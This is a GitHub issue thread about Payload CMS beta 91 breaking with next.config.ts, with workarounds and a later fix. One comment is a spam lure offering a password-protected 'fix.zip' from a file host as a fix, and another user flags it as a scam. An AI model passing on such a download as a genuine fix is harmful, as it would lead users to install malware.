### ISSUE TITLE
Beta 91 breaks with next.config.ts

### ISSUE THREAD

**Issue by iamlinkus** [payloadcms/payload#7859]
### Payload Version

Beta 91

### Node Version

21.4.0

### Next.js Version

Canary 130

### Describe the Bug

After updating from payload beta 90 to 91 without any other changes, when running dev it throws this:

```cmd
node:internal/modules/cjs/loader:1181
  const err = new Error(`Cannot find module '${request}'`);
              ^        
              
Error: Cannot find module '.../node_modules/@payloadcms/next/dist/cjs/withPayload.cjs'
```

### Reproduction Steps

1. `pnpm create payload-app@beta` 
2. Replace dependencies to use next canary 130 and payload beta 91.
3. Rename `next.config.js` to `next.config.ts`.
3. `pnpm devsafe` 
4. Boom.

Reverting to beta 90 and leaving everything else the same fixes the issue.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tyteen4a03** [comment]
Scam comment above ^

**Comment by tyteen4a03** [comment]
Can you retry with Next canary 107?

Also, do you have `"type": "module"` in your package.json?

**Comment by iamlinkus** [comment]
> Can you retry with Next canary 107?
> 
> Also, do you have `"type": "module"` in your package.json?

On any version before 91 (and all latest next canaries) everything worked perfectly. Is there a specific reason you want me to try downgrading next? It works when I downgrade payload to 90, and leave next at 130.

**Comment by tyteen4a03** [comment]
Until Beta concludes I would recommend sticking to exactly the package versions that Payload's examples specifies: https://github.com/payloadcms/payload-3.0-demo/blob/main/package.json as Next canaries can easily break Payload.

**Comment by iamlinkus** [comment]
> Until Beta concludes I would recommend sticking to exactly the package versions that Payload's examples specifies: https://github.com/payloadcms/payload-3.0-demo/blob/main/package.json as Next canaries can easily break Payload.

I think it's fair to assume that next is not at fault here, since it worked and still works with all the ~2 weeks worth of canaries and the only difference between working and not working is payload version 91 vs 90. I've got at least 4 projects currently in production with canaries higher than the example and closer to the current ones with no issues whatsoever. But this is beside the point, you're commenting on a bug report for a specific case for the latest beta, I don't think "sticking to old versions" to "solve" an issue on a OSS project is helpful, @tyteen4a03, don't you think?

**Comment by tyteen4a03** [comment]
I guess I should reword it as `Payload can be easily broken by newer Next canaries`, which is just an unfortunate fact working with Betas.

There's nothing wrong with the issue, just suggesting sticking to the current versions in case you wanted the problem fixed quickly :)

**Comment by iamlinkus** [comment]
Thanks, @tyteen4a03 , I'm fully aware of the dangers of working with beta/canary software :) As I mentioned in the issue, reverting back to payload beta v90 is how I made the problem go away quickly and will stick to that until this issue resolved.

**Comment by iamlinkus** [comment]
Just checked, version 95 still has the same problem

**Comment by w41x** [comment]
I'm having the same issue with 
Node v22.7.0
PayloadCMS v3.0.0-beta.96 and 
NextJS v15-15.0.0-canary.134.

Also I'm using `next.config.ts` instead of `next.config.js`.

I solved it by going back to `next.config.js`. 
But I think using TypeScript for the next.config file is a good feature (on NextJS side) and should be supported by PayloadCMS!

**Comment by r1tsuu** [comment]
Try to use `.mts` extension instead of `.ts`

**Comment by mvarendorff** [comment]
This should be fixed with https://github.com/payloadcms/payload/pull/8521 (beta.111).
